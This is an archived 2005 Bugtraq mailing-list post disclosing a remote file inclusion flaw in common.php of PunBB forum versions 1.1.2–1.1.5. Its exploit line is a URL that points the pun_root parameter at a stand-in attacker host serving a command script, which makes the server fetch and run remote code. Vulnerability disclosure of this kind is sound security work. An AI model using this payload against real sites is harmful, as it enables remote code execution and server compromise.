[40852] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Remote File Inclusion in forum PunBB

daemon@ATHENA.MIT.EDU (rod hedor)
Mon Oct 24 13:55:08 2005

Message-ID: <BAY114-F14895C1F74632F773D0FFFC2770@phx.gbl>
From: "rod hedor" <rodhedor@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 24 Oct 2005 01:57:40 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed


Remote File Inclusion in forum PunBB

Date:24/10/2005

Severity: High

version: 1.1.2 >> 1.1.5

The bug reside in common.php



Exploit :

http://www.host.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id


Discovery by RoDheDoR

L-G-H Team

http://www.lezr.com

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now! 
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[40852] in bugtraq

Remote File Inclusion in forum PunBB

daemon@ATHENA.MIT.EDU (rod hedor)Mon Oct 24 13:55:08 2005

daemon@ATHENA.MIT.EDU (rod hedor)
Mon Oct 24 13:55:08 2005